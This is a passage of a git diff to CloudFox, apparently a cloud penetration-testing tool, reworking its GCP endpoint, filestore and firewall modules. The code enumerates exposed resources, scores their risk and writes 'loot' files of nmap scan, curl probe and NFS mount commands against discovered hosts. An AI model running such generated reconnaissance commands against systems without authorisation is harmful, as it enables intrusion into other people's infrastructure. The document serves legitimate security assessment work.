Address: addr.Address, - Protocol: "-", - Port: "-", + Protocol: "TCP/UDP", + Port: "ALL", Resource: user, ResourceType: "Address", Region: region.Name, - ProjectID: projectID, Status: addr.Status, - Description: addr.Description, + RiskLevel: "Medium", + RiskReasons: []string{"Static external IP"}, + IsExternal: true, + } + if user == "" { + ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") } - endpoints = append(endpoints, ep) + m.addEndpoint(ep) } } return nil }) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list addresses in region %s: %v", region.Name, err), globals.GCP_ENDPOINTS_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list addresses in region %s", region.Name)) } } return nil }) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list regions: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regions in project %s", projectID)) } +} - return endpoints +// getInstanceIPs retrieves instances with both external and internal IPs +func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + for _, instance := range scopedList.Instances { + zoneName := extractZoneFromScope(zone) + + // Get service account + var serviceAccount string + if len(instance.ServiceAccounts) > 0 { + serviceAccount = instance.ServiceAccounts[0].Email + } + + for _, iface := range instance.NetworkInterfaces { + networkName := extractResourceName(iface.Network) + + // Collect external IPs + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Instance IP", + Address: accessConfig.NatIP, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: true, + NetworkTags: instance.Tags.Items, + Network: networkName, + } + + // Classify risk + ep.RiskLevel, ep.RiskReasons = m.classifyInstanceRisk(instance) + + m.addEndpoint(ep) + } + } + + // Collect internal IPs + if iface.NetworkIP != "" { + // Determine ports from firewall rules + ports := m.getPortsForInstance(networkName, instance.Tags) + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Internal IP", + Address: iface.NetworkIP, + Protocol: "TCP/UDP", + Port: ports, + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: false, + NetworkTags: instance.Tags.Items, + Network: networkName, + } + + ep.RiskLevel, ep.RiskReasons = m.classifyInternalInstanceRisk(instance, ports) + m.addEndpoint(ep) + } + } + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list instances in project %s", projectID)) + } } -// getForwardingRules retrieves regional forwarding rules (load balancers) -func (m *EndpointsModule) getForwardingRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { - var endpoints []EndpointInfo +// getPortsForInstance determines open ports for an instance based on firewall rules +func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags) string { + var allPorts []string - // Aggregate across all regions + // Check for rules with no target tags (apply to all instances in network) + if ports, ok := m.firewallPortMap[network]; ok { + allPorts = append(allPorts, ports...) + } + + // Check for rules matching instance tags + if tags != nil { + for _, tag := range tags.Items { + key := fmt.Sprintf("%s:%s", network, tag) + if ports, ok := m.firewallPortMap[key]; ok { + allPorts = append(allPorts, ports...) + } + } + } + + if len(allPorts) == 0 { + return "ALL" // Unknown, scan all ports + } + + // Deduplicate ports + portSet := make(map[string]bool) + for _, p := range allPorts { + portSet[p] = true + } + var uniquePorts []string + for p := range portSet { + uniquePorts = append(uniquePorts, p) + } + + return strings.Join(uniquePorts, ",") +} + +// classifyInternalInstanceRisk determines risk for internal endpoints +func (m *EndpointsModule) classifyInternalInstanceRisk(instance *compute.Instance, ports string) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Internal network access") + + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 1 + } + + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope") + score += 2 + } + } + } + + // Check for dangerous ports + dangerousPorts := []string{"22", "3389", "3306", "5432", "27017", "6379"} + for _, dp := range dangerousPorts { + if strings.Contains(ports, dp) { + score += 1 + break + } + } + + if score >= 3 { + return "High", reasons + } else if score >= 1 { + return "Medium", reasons + } + return "Low", reasons +} + +// getLoadBalancers retrieves both external and internal load balancers +func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Regional forwarding rules req := svc.ForwardingRules.AggregatedList(projectID) err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { for region, scopedList := range page.Items { @@ -266,25 +426,24 @@ func (m *EndpointsModule) getForwardingRules(ctx context.Context, svc *compute.S continue } for _, rule := range scopedList.ForwardingRules { - // Only include external load balancers - if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { - ports := "-" - if rule.PortRange != "" { - ports = rule.PortRange - } else if len(rule.Ports) > 0 { - ports = strings.Join(rule.Ports, ",") - } else if rule.AllPorts { - ports = "ALL" - } + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } else if len(rule.Ports) > 0 { + ports = strings.Join(rule.Ports, ",") + } - target := extractResourceName(rule.Target) - if target == "" && rule.BackendService != "" { - target = extractResourceName(rule.BackendService) - } + target := extractResourceName(rule.Target) + if target == "" && rule.BackendService != "" { + target = extractResourceName(rule.BackendService) + } - regionName := extractRegionFromScope(region) + isExternal := rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" + isInternal := rule.LoadBalancingScheme == "INTERNAL" || rule.LoadBalancingScheme == "INTERNAL_MANAGED" || rule.LoadBalancingScheme == "INTERNAL_SELF_MANAGED" - ep := EndpointInfo{ + if isExternal { + ep := Endpoint{ + ProjectID: projectID, Name: rule.Name, Type: "LoadBalancer", Address: rule.IPAddress, @@ -292,117 +451,308 @@ func (m *EndpointsModule) getForwardingRules(ctx context.Context, svc *compute.S Port: ports, Resource: target, ResourceType: "ForwardingRule", - Region: regionName, + Region: extractRegionFromScope(region), + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Medium", + RiskReasons: []string{"External load balancer"}, + IsExternal: true, + Network: extractResourceName(rule.Network), + } + + if !ep.TLSEnabled && ports != "443" { + ep.RiskLevel = "High" + ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") + } + + m.addEndpoint(ep) + } else if isInternal { + ep := Endpoint{ ProjectID: projectID, - Status: "-", - Description: rule.Description, + Name: rule.Name, + Type: "Internal LB", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Low", + RiskReasons: []string{"Internal load balancer"}, + IsExternal: false, + Network: extractResourceName(rule.Network), } - endpoints = append(endpoints, ep) + + m.addEndpoint(ep) } } } return nil }) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list forwarding rules: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list forwarding rules in project %s", projectID)) } - return endpoints -} - -// getGlobalForwardingRules retrieves global forwarding rules (global load balancers) -func (m *EndpointsModule) getGlobalForwardingRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { - var endpoints []EndpointInfo - - req := svc.GlobalForwardingRules.List(projectID) - err := req.Pages(ctx, func(page *compute.ForwardingRuleList) error { + // Global forwarding rules (external only - no internal global LBs) + globalReq := svc.GlobalForwardingRules.List(projectID) + err = globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { for _, rule := range page.Items { if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { - ports := "-" + ports := "ALL" if rule.PortRange != "" { ports = rule.PortRange } - target := extractResourceName(rule.Target) - - ep := EndpointInfo{ + ep := Endpoint{ + ProjectID: projectID, Name: rule.Name, Type: "Global LoadBalancer", Address: rule.IPAddress, Protocol: rule.IPProtocol, Port: ports, - Resource: target, + Resource: extractResourceName(rule.Target), ResourceType: "GlobalForwardingRule", Region: "global", - ProjectID: projectID, - Status: "-", - Description: rule.Description, + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Medium", + RiskReasons: []string{"External global load balancer"}, + IsExternal: true, + } + + if !ep.TLSEnabled && ports != "443" { + ep.RiskLevel = "High" + ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") } - endpoints = append(endpoints, ep) + + m.addEndpoint(ep) } } return nil }) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list global forwarding rules: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) } - - return endpoints } -// getInstanceExternalIPs retrieves instances with external IPs -func (m *EndpointsModule) getInstanceExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) []EndpointInfo { - var endpoints []EndpointInfo +// getCloudRunServices retrieves Cloud Run services with public URLs +func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Cloud Run service in project %s", projectID)) + return + } - req := svc.Instances.AggregatedList(projectID) - err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { - for zone, scopedList := range page.Items { - if scopedList.Instances == nil { + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + return + } + + for _, service := range resp.Items { + if service.Status != nil && service.Status.Url != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: service.Metadata.Name, + Type: "Cloud Run", + FQDN: service.Status.Url, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudRun", + TLSEnabled: true, + RiskLevel: "Medium", + RiskReasons: []string{"Public Cloud Run service"}, + IsExternal: true, // Cloud Run services are always external + } + + // Extract region from metadata + if service.Metadata != nil && service.Metadata.Labels != nil { + if region, ok := service.Metadata.Labels["cloud.googleapis.com/location"]; ok { + ep.Region = region + } + } + + // Get service account + if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { + ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName + } + + m.addEndpoint(ep) + } + } +} + +// analyzeFirewallRules analyzes firewall rules and builds port mapping for instances +func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Firewalls.List(projectID) + err := req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + if fw.Direction != "INGRESS" { continue } - for _, instance := range scopedList.Instances { - for _, iface := range instance.NetworkInterfaces { - for _, accessConfig := range iface.AccessConfigs { - if accessConfig.NatIP != "" { - zoneName := extractZoneFromScope(zone) - ipType := "Ephemeral IP" - if accessConfig.Type == "ONE_TO_ONE_NAT" { - ipType = "Instance IP" - } + networkName := extractResourceName(fw.Network) - ep := EndpointInfo{ - Name: instance.Name, - Type: ipType, - Address: accessConfig.NatIP, - Protocol: "TCP/UDP", - Port: "ALL", - Resource: instance.Name, - ResourceType: "Instance", - Region: zoneName, - ProjectID: projectID, - Status: instance.Status, - Description: instance.Description, - } - endpoints = append(endpoints, ep) - } - } + // Collect all allowed ports for this rule + var rulePorts []string + for _, allowed := range fw.Allowed { + if len(allowed.Ports) == 0 { + // No specific ports means all ports for this protocol + rulePorts = append(rulePorts, "ALL") + } else { + rulePorts = append(rulePorts, allowed.Ports...) + } + } + + // Build firewall port map for internal IP port determination + m.mu.Lock() + if len(fw.TargetTags) == 0 { + // Rule applies to all instances in network + m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) + } else { + // Rule applies to instances with specific tags + for _, tag := range fw.TargetTags { + key := fmt.Sprintf("%s:%s", networkName, tag) + m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) + } + } + m.mu.Unlock() + + // Check if rule allows ingress from 0.0.0.0/0 (public access) + isPublic := false + for _, sr := range fw.SourceRanges { + if sr == "0.0.0.0/0" { + isPublic = true + break + } + } + + if isPublic { + fwRule := FirewallRule{ + ProjectID: projectID, + RuleName: fw.Name, + Network: networkName, + Direction: fw.Direction, + SourceRanges: fw.SourceRanges, + TargetTags: fw.TargetTags, + Ports: rulePorts, + } + + // Get protocol + if len(fw.Allowed) > 0 { + fwRule.Protocol = fw.Allowed[0].IPProtocol } + + // Classify risk + fwRule.RiskLevel, fwRule.RiskReasons = m.classifyFirewallRisk(fwRule) + + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, fwRule) + m.mu.Unlock() } } return nil }) if err != nil { - logger.InfoM(fmt.Sprintf("Could not list instances: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) } +} - return endpoints +// addEndpoint adds an endpoint thread-safely to appropriate list and to loot +func (m *EndpointsModule) addEndpoint(ep Endpoint) { + m.mu.Lock() + if ep.IsExternal { + m.ExternalEndpoints = append(m.ExternalEndpoints, ep) + } else { + m.InternalEndpoints = append(m.InternalEndpoints, ep) + } + m.addEndpointToLoot(ep) + m.mu.Unlock() } -// Helper functions +// classifyInstanceRisk determines the risk level of an exposed instance +func (m *EndpointsModule) classifyInstanceRisk(instance *compute.Instance) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Has external IP") + score += 1 + + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 2 + } + + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope (full access)") + score += 3 + } + } + } + + if score >= 4 { + return "Critical", reasons + } else if score >= 2 { + return "High", reasons + } + return "Medium", reasons +} + +// classifyFirewallRisk determines the risk level of a public firewall rule +func (m *EndpointsModule) classifyFirewallRisk(rule FirewallRule) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Allows traffic from 0.0.0.0/0") + score += 1 + + dangerousPorts := map[string]string{ + "22": "SSH", + "3389": "RDP", + "3306": "MySQL", + "5432": "PostgreSQL", + "27017": "MongoDB", + "6379": "Redis", + "9200": "Elasticsearch", + } + + for _, port := range rule.Ports { + if name, ok := dangerousPorts[port]; ok { + reasons = append(reasons, fmt.Sprintf("Exposes %s (port %s)", name, port)) + score += 3 + } + if strings.Contains(port, "-") { + reasons = append(reasons, fmt.Sprintf("Wide port range: %s", port)) + score += 2 + } + } + + if len(rule.TargetTags) == 0 { + reasons = append(reasons, "No target tags (applies to all instances)") + score += 2 + } + + if score >= 5 { + return "Critical", reasons + } else if score >= 3 { + return "High", reasons + } + return "Medium", reasons +} + +// ------------------------------ +// Helper Functions +// ------------------------------ func extractResourceName(url string) string { if url == "" { - return "-" + return "" } parts := strings.Split(url, "/") if len(parts) > 0 { @@ -429,64 +779,111 @@ func extractZoneFromScope(scope string) string { return scope } +// getIPAndHostname extracts IP address and hostname from an endpoint +// Returns "-" for fields that are not applicable +func getIPAndHostname(ep Endpoint) (ipAddr string, hostname string) { + ipAddr = "-" + hostname = "-" + + // If we have an IP address (Address field) + if ep.Address != "" { + ipAddr = ep.Address + } + + // If we have a FQDN/hostname + if ep.FQDN != "" { + // Strip protocol prefix + host := ep.FQDN + host = strings.TrimPrefix(host, "https://") + host = strings.TrimPrefix(host, "http://") + // Remove any trailing path + if idx := strings.Index(host, "/"); idx != -1 { + host = host[:idx] + } + hostname = host + } + + return ipAddr, hostname +} + // ------------------------------ // Loot File Management // ------------------------------ func (m *EndpointsModule) initializeLootFiles() { - m.LootMap["endpoints-all-ips"] = &internal.LootFile{ - Name: "endpoints-all-ips", - Contents: "", + m.LootMap["endpoints-external-commands"] = &internal.LootFile{ + Name: "endpoints-external-commands", + Contents: "# External Endpoints Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized penetration testing of internet-facing resources\n\n", } - m.LootMap["endpoints-load-balancers"] = &internal.LootFile{ - Name: "endpoints-load-balancers", - Contents: "# Load Balancer Endpoints\n# Generated by CloudFox\n\n", + m.LootMap["endpoints-internal-commands"] = &internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: "# Internal Endpoints Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized internal network penetration testing\n" + + "# Note: These targets require internal network access or VPN connection\n\n", } - m.LootMap["endpoints-instance-ips"] = &internal.LootFile{ - Name: "endpoints-instance-ips", - Contents: "# Instance External IPs\n# Generated by CloudFox\n\n", +} + +func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { + target := ep.Address + if target == "" { + target = ep.FQDN } - m.LootMap["endpoints-nmap-targets"] = &internal.LootFile{ - Name: "endpoints-nmap-targets", - Contents: "# Nmap Targets\n# Generated by CloudFox\n# nmap -iL endpoints-nmap-targets.txt\n\n", + if target == "" { + return } -} -func (m *EndpointsModule) addEndpointToLoot(ep EndpointInfo) { - // All IPs (plain list for tools) - if ep.Address != "" && ep.Address != "-" { - m.LootMap["endpoints-all-ips"].Contents += ep.Address + "\n" - m.LootMap["endpoints-nmap-targets"].Contents += ep.Address + "\n" + // Strip protocol prefix for nmap (needs just hostname/IP) + hostname := target + hostname = strings.TrimPrefix(hostname, "https://") + hostname = strings.TrimPrefix(hostname, "http://") + // Remove any trailing path + if idx := strings.Index(hostname, "/"); idx != -1 { + hostname = hostname[:idx] } - // Load balancers - if strings.Contains(ep.Type, "LoadBalancer") { - m.LootMap["endpoints-load-balancers"].Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Target: %s\n"+ - "# Protocol: %s, Ports: %s\n"+ - "IP=%s\n\n", - ep.Name, - ep.Type, - ep.Resource, - ep.Protocol, - ep.Port, - ep.Address, - ) + // Build nmap command based on endpoint type and port info + var nmapCmd string + switch { + case ep.Port == "ALL" || ep.Port == "": + // Unknown ports - scan all common ports (or full range for internal) + if ep.IsExternal { + nmapCmd = fmt.Sprintf("nmap -sV -Pn %s", hostname) + } else { + // For internal, scan all ports since we don't know what's open + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p- %s", hostname) + } + case strings.Contains(ep.Port, ","): + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + case strings.Contains(ep.Port, "-"): + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) + default: + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p %s %s", ep.Port, hostname) } - // Instance IPs - if ep.ResourceType == "Instance" { - m.LootMap["endpoints-instance-ips"].Contents += fmt.Sprintf( - "# Instance: %s (%s)\n"+ - "# Zone: %s\n"+ - "# Status: %s\n"+ - "IP=%s\n\n", - ep.Name, - ep.ProjectID, - ep.Region, - ep.Status, - ep.Address, - ) + // Select appropriate loot file + lootKey := "endpoints-external-commands" + if !ep.IsExternal { + lootKey = "endpoints-internal-commands" + } + + m.LootMap[lootKey].Contents += fmt.Sprintf( + "# %s: %s (%s)\n"+ + "# Project: %s | Region: %s | Network: %s\n"+ + "%s\n\n", + ep.Type, ep.Name, ep.ResourceType, + ep.ProjectID, ep.Region, ep.Network, + nmapCmd, + ) + + // Add HTTP/HTTPS test for web-facing endpoints + if ep.Type == "LoadBalancer" || ep.Type == "Global LoadBalancer" || ep.Type == "Cloud Run" { + if ep.TLSEnabled || ep.Port == "443" { + m.LootMap[lootKey].Contents += fmt.Sprintf("curl -vk https://%s/\n\n", hostname) + } else { + m.LootMap[lootKey].Contents += fmt.Sprintf("curl -v http://%s/\n\n", hostname) + } } } @@ -494,110 +891,75 @@ func (m *EndpointsModule) addEndpointToLoot(ep EndpointInfo) { // Output Generation // ------------------------------ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main endpoints table - endpointsHeader := []string{ - "Address", + // Status column shows operational state: RUNNING, STOPPED, IN_USE, RESERVED, etc. + header := []string{ + "Project ID", + "Project Name", + "Name", "Type", + "IP Address", + "Hostname", "Protocol", "Port", - "Resource", - "Resource Type", "Region", - "Project Name", - "Project", + "Network", "Status", } - var endpointsBody [][]string - for _, ep := range m.Endpoints { - endpointsBody = append(endpointsBody, []string{ - ep.Address, + // External endpoints table + var externalBody [][]string + for _, ep := range m.ExternalEndpoints { + ipAddr, hostname := getIPAndHostname(ep) + externalBody = append(externalBody, []string{ + ep.ProjectID, + m.GetProjectName(ep.ProjectID), + ep.Name, ep.Type, + ipAddr, + hostname, ep.Protocol, ep.Port, - ep.Resource, - ep.ResourceType, ep.Region, - m.GetProjectName(ep.ProjectID), - ep.ProjectID, + ep.Network, ep.Status, }) } - // Load balancers table - lbHeader := []string{ - "Name", - "Address", - "Protocol", - "Ports", - "Target", - "Region", - "Project Name", - "Project", - } - - var lbBody [][]string - for _, ep := range m.Endpoints { - if strings.Contains(ep.Type, "LoadBalancer") { - lbBody = append(lbBody, []string{ - ep.Name, - ep.Address, - ep.Protocol, - ep.Port, - ep.Resource, - ep.Region, - m.GetProjectName(ep.ProjectID), - ep.ProjectID, - }) - } - } - - // Instance IPs table - instanceHeader := []string{ - "Instance", - "Address", - "Zone", - "Status", - "Project Name", - "Project", - } - - var instanceBody [][]string - for _, ep := range m.Endpoints { - if ep.ResourceType == "Instance" { - instanceBody = append(instanceBody, []string{ - ep.Name, - ep.Address, - ep.Region, - ep.Status, - m.GetProjectName(ep.ProjectID), - ep.ProjectID, - }) - } + // Internal endpoints table + var internalBody [][]string + for _, ep := range m.InternalEndpoints { + ipAddr, hostname := getIPAndHostname(ep) + internalBody = append(internalBody, []string{ + ep.ProjectID, + m.GetProjectName(ep.ProjectID), + ep.Name, + ep.Type, + ipAddr, + hostname, + ep.Protocol, + ep.Port, + ep.Region, + ep.Network, + ep.Status, + }) } - // Static IPs table - staticHeader := []string{ - "Name", - "Address", - "Used By", - "Region", - "Status", - "Project Name", - "Project", - } - - var staticBody [][]string - for _, ep := range m.Endpoints { - if ep.Type == "Static IP" { - staticBody = append(staticBody, []string{ - ep.Name, - ep.Address, - ep.Resource, - ep.Region, - ep.Status, - m.GetProjectName(ep.ProjectID), - ep.ProjectID, + // Firewall rules table (public 0.0.0.0/0 rules only) + var fwBody [][]string + if len(m.FirewallRules) > 0 { + for _, fw := range m.FirewallRules { + tags := strings.Join(fw.TargetTags, ",") + if tags == "" { + tags = "ALL" + } + fwBody = append(fwBody, []string{ + fw.ProjectID, + m.GetProjectName(fw.ProjectID), + fw.RuleName, + fw.Network, + fw.Protocol, + strings.Join(fw.Ports, ","), + tags, }) } } @@ -611,39 +973,37 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge } // Build tables - tables := []internal.TableFile{ - { - Name: "endpoints", - Header: endpointsHeader, - Body: endpointsBody, - }, - } + var tables []internal.TableFile - // Add load balancers table if there are any - if len(lbBody) > 0 { + if len(externalBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "endpoints-loadbalancers", - Header: lbHeader, - Body: lbBody, + Name: "endpoints-external", + Header: header, + Body: externalBody, }) } - // Add instances table if there are any - if len(instanceBody) > 0 { + if len(internalBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "endpoints-instances", - Header: instanceHeader, - Body: instanceBody, + Name: "endpoints-internal", + Header: header, + Body: internalBody, }) - logger.InfoM(fmt.Sprintf("[INFO] Found %d instance(s) with external IPs", len(instanceBody)), globals.GCP_ENDPOINTS_MODULE_NAME) } - // Add static IPs table if there are any - if len(staticBody) > 0 { + if len(fwBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "endpoints-static-ips", - Header: staticHeader, - Body: staticBody, + Name: "endpoints-firewall", + Header: []string{ + "Project ID", + "Project Name", + "Rule", + "Network", + "Protocol", + "Ports", + "Target Tags", + }, + Body: fwBody, }) } @@ -652,25 +1012,25 @@ func (m *EndpointsModule) writeOutput(ctx context.Context, logger internal.Logge Loot: lootFiles, } - // Write output using HandleOutputSmart with scope support scopeNames := make([]string, len(m.ProjectIDs)) for i, id := range m.ProjectIDs { scopeNames[i] = m.GetProjectName(id) } + err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - scopeNames, // scopeNames + "project", + m.ProjectIDs, + scopeNames, m.Account, output, ) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ENDPOINTS_MODULE_NAME) + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "exposure") m.CommandCounter.Error++ } } diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go index adffca33..23dd7334 100644 --- a/gcp/commands/filestore.go +++ b/gcp/commands/filestore.go @@ -82,24 +82,56 @@ func (m *FilestoreModule) processProject(ctx context.Context, projectID string, } func (m *FilestoreModule) initializeLootFiles() { - m.LootMap["filestore-mounts"] = &internal.LootFile{ - Name: "filestore-mounts", - Contents: "# Filestore NFS Mount Commands\n# Generated by CloudFox\n\n", + m.LootMap["filestore-commands"] = &internal.LootFile{ + Name: "filestore-commands", + Contents: "# Filestore Commands\n# Generated by CloudFox\n\n", } } func (m *FilestoreModule) addToLoot(instance filestoreservice.FilestoreInstanceInfo) { - for _, share := range instance.Shares { - for _, ip := range instance.IPAddresses { - m.LootMap["filestore-mounts"].Contents += fmt.Sprintf( - "# Instance: %s, Share: %s (%dGB)\nmount -t nfs %s:/%s /mnt/%s\n\n", - instance.Name, share.Name, share.CapacityGB, ip, share.Name, share.Name) + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# %s (%s)\n"+ + "# Project: %s\n", + instance.Name, instance.Location, + instance.ProjectID, + ) + + // gcloud command + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "gcloud filestore instances describe %s --location=%s --project=%s\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Mount commands for each share + if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { + m.LootMap["filestore-commands"].Contents += "# Mount commands:\n" + for _, share := range instance.Shares { + for _, ip := range instance.IPAddresses { + m.LootMap["filestore-commands"].Contents += fmt.Sprintf( + "# Share: %s (%dGB)\n"+ + "mount -t nfs %s:/%s /mnt/%s\n", + share.Name, share.CapacityGB, + ip, share.Name, share.Name, + ) + } } } + + m.LootMap["filestore-commands"].Contents += "\n" } func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{"Name", "Location", "Tier", "Network", "IP", "Shares", "State", "Project Name", "Project"} + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Network", + "IP", + "Shares", + "State", + } var body [][]string for _, instance := range m.Instances { @@ -107,16 +139,32 @@ func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logge for _, share := range instance.Shares { shareNames = append(shareNames, share.Name) } + + ip := strings.Join(instance.IPAddresses, ", ") + if ip == "" { + ip = "-" + } + + shares := strings.Join(shareNames, ", ") + if shares == "" { + shares = "-" + } + + network := instance.Network + if network == "" { + network = "-" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, instance.Name, instance.Location, instance.Tier, - instance.Network, - strings.Join(instance.IPAddresses, ", "), - strings.Join(shareNames, ", "), + network, + ip, + shares, instance.State, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, }) } diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go index 6e6e3510..eb9d1acd 100644 --- a/gcp/commands/firewall.go +++ b/gcp/commands/firewall.go @@ -98,19 +98,14 @@ func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { return } - // Count security issues - highRiskCount := 0 + // Count public ingress rules and peerings publicIngressCount := 0 for _, rule := range m.FirewallRules { - if rule.RiskLevel == "HIGH" { - highRiskCount++ - } if rule.IsPublicIngress { publicIngressCount++ } } - // Count peerings peeringCount := 0 for _, network := range m.Networks { peeringCount += len(network.Peerings) @@ -118,9 +113,6 @@ func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", len(m.Networks), len(m.Subnets), len(m.FirewallRules)) - if highRiskCount > 0 { - msg += fmt.Sprintf(" [%d HIGH RISK!]", highRiskCount) - } if publicIngressCount > 0 { msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) } @@ -194,52 +186,16 @@ func (m *FirewallModule) processProject(ctx context.Context, projectID string, l // Loot File Management // ------------------------------ func (m *FirewallModule) initializeLootFiles() { - m.LootMap["firewall-gcloud-commands"] = &internal.LootFile{ - Name: "firewall-gcloud-commands", - Contents: "# Firewall gcloud Commands\n# Generated by CloudFox\n\n", - } - m.LootMap["firewall-public-ingress"] = &internal.LootFile{ - Name: "firewall-public-ingress", - Contents: "# PUBLIC INGRESS Firewall Rules 